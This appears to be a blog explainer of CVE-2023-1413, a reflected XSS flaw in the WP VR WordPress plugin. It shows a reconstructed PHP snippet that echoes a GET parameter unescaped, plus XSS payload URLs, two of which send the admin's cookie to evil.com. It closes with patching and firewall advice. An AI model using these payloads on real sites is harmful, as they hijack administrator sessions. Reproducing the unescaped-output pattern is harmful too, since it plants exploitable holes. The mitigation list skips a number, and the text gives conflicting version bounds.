CVE-2023-1413 - How WP VR Plugin's XSS Vulnerability Can Affect Your WordPress Site (With Exploit Example)

CVE-2023-1413 is an important security issue that affects the popular WP VR plugin for WordPress, versions up to 8.2.9. In this post, I’ll explain in simple language what the vulnerability is, how attackers can use it, and show a practical exploit example. We’ll also look at best practices to stay protected.

What is WP VR and What Happened?

WP VR lets you create 360-degree virtual tours easily on your WordPress website. It’s widely used by real estate agents, museums, and businesses that want an immersive experience for visitors.

The Problem:  
Versions before 8.2.9 of this plugin have a bug: they do not sanitize or escape certain parameters from the user input before showing them on the web page. This small mistake leads to what’s called a Reflected Cross-Site Scripting (XSS) vulnerability.

What is Reflected Cross-Site Scripting (XSS)?

Reflected XSS is when an attacker tricks a victim (such as an admin user) into visiting a crafted URL. Dangerous JavaScript code from the attacker ends up immediately running in the victim’s browser with the permissions of that logged-in user.

References (For the Details)

- WPScan Advisory: CVE-2023-1413
- NVD Listing: CVE-2023-1413
- WP VR Plugin
- Original Patch (8.2.9 Changelog)

The Vulnerable Code (Reconstructed Example)

Inside one of WP VR’s PHP files, parameters from GET or POST requests are shown directly on the page, like:

<!-- BAD: No sanitizing or escaping -->
<div id="wpvr-message">
  <?php echo $_GET['message']; ?>
</div>

If the message parameter in the URL contains HTML or JavaScript, it will run when the admin views the page.

An attacker sends a logged-in admin a *special link* like

https://example.com/wp-admin/admin.php?page=wpvr&message=<script>fetch('https://evil.com?c='+document.cookie)</script>;

If the admin clicks it, their browser runs the attacker’s evil code — here, stealing the admin’s cookie.

Let’s create a simple XSS payload

https://yoursite.com/wp-admin/admin.php?page=wpvr&message=<script>alert('Hacked!')</script>;

If an admin visits this link, an alert pops up. A real attacker would use more hidden code to grab the admin’s credentials, not just an alert.

Stealing the Cookie (DON’T DO THIS on real sites! Just for understanding)

https://yoursite.com/wp-admin/admin.php?page=wpvr&message=<script>new Image().src='https://evil.com/?cookie='+document.cookie</script>;

Every time an admin clicks this link, their session cookie is sent to the attacker’s server.

1. Update Immediately

If you use WP VR, update to version 8.2.9 or higher. Get the newest version.

3. Use Web Application Firewalls (WAF)

Tools like Wordfence or Sucuri can block XSS attacks automatically.

4. Educate Users

Train your site admins to avoid clicking strange admin links, even if sent by colleagues.

Conclusion

CVE-2023-1413 is a strong reminder of how dangerous even simple coding mistakes can be for WordPress plugins. Always keep your plugins up to date, and if you build custom code, sanitize and escape everything. Administrators should be careful with unfamiliar links, especially on admin screens.

Stay safe, and keep your WordPress secure!

*For more info on this CVE, check the WPScan Advisory and the NVD official page.*

Timeline

Published on: 04/17/2023 13:15:00 UTC
Last modified on: 04/25/2023 19:31:00 UTC